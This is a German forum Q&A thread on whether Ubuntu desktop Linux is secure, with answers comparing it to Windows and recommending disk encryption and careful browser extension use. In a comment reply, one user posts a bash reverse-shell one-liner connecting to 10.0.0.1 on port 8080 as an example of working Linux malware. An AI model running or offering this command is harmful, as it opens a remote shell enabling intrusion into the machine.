Ist Linux (ubuntu desktop) sicher?

10 Antworten

Selbstverständlich. Sogar um einiges sicherer als Windows. 100-prozentige Sicherheit gibt es aber natürlich auch da nicht.

Woher ich das weiß:eigene Erfahrung – Nutze Linux täglich, sowohl auf Server als auch Desktop

Das größte Sicherheitsrisiko sitzt, egal welches System - vor dem Computer. Ein Beispiel dafür sind zu kurze oder im Klartext gespeicherte Passwörter.

Die Systemarchitektur von Linux-Systemen ist besser als die von Windows.

Woher ich das weiß:eigene Erfahrung

Wenn man bedenkt, dass in Firefox und Chrome einige Apps die Berechtigung erhalten Zugriff auf Deine gesamten Daten zu erhalten würde ich behaupten NEIN! Nicht unter Windoof und auch nicht unter Linux.

Neuerdings verwende ich zwei Browser. Einen mit meinen notwendigen Apps. Einen weiteren komplett ohne Apps für Seiten auf denen ich mich anmelde und Passwörter verwende. :)

Woher ich das weiß:Hobby – Hobby und Studium

Kein Betriebssystem wird dich davor schützen, dass dein PC/Laptop oder Teile davon geklaut werden. Wer physischen Zugang hat, kann das machen.

Wenn du aber eine Festplatten-Verschlüsselung wie per LUKS einrichtest, dann kommt man nach Diebstahl zumindest an die Daten nicht mehr ran.

In Bezug auf Viren, Datenkraken etc ist es Betriebssystemen wir Windows und macOS weit überlegen. Siehe auch

https://wiki.ubuntuusers.de/Sicherheit/

https://wiki.ubuntuusers.de/Sicherheits-Einmaleins/

Vielleicht lohnt sich für dich auch folgende Lektüre:

https://wiki.ubuntuusers.de/Einsteiger/

Wichtig: Linux-Distributionen wie Ubuntu, Linux Mint, openSUSE & Co. funktionieren anders als Windows oder macOS. Darauf muss man sich einlassen und anfangs umlernen, sonst wird das nicht funktionieren. Ich rede da aus eigener Erfahrung :D Ist ähnlich wie der Umstieg zwischen Smartphones, bei denen die Lauter-/Leiser-Tasten anders angeordnet sind.

Nicht 100%, aber deutlich sicherer als Windows.

Woher ich das weiß:Studium / Ausbildung – Informatik
gonzo1233  19.06.2023, 22:05

Kennst du einen funktionierenden Linux Schädling?

Waldelb3  20.06.2023, 00:02
@gonzo1233
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

Anmerkung: Bitte nicht ausführen, das funktioniert wirklich.

gonzo1233  24.06.2023, 21:26
@Waldelb3

Mit lokalen Root Rechten kann ich auch die Platte formatieren - insofern ist das keine Kunst wenn du am Rechner sitzt und eingeloggt bist.

Hast du einen Schädling der per Mail verschickt einen Linux Rechner übernehmen kann`(nur durch Öffnen der Mail)?

Laut dem Bundesamt für Sicherheit in der Informationtechnik ist für Linux nicht mal ein Virenscanner nötig. Windows hingegen ist nicht überlebensfähig ohne so ein Krücken-Programm.

Waldelb3  24.06.2023, 23:15
@gonzo1233

Dafür bräuchtest du halt einen 0-day-exploit im Mailprogramm. Die gibt es nicht all zu oft, aber die gibt es.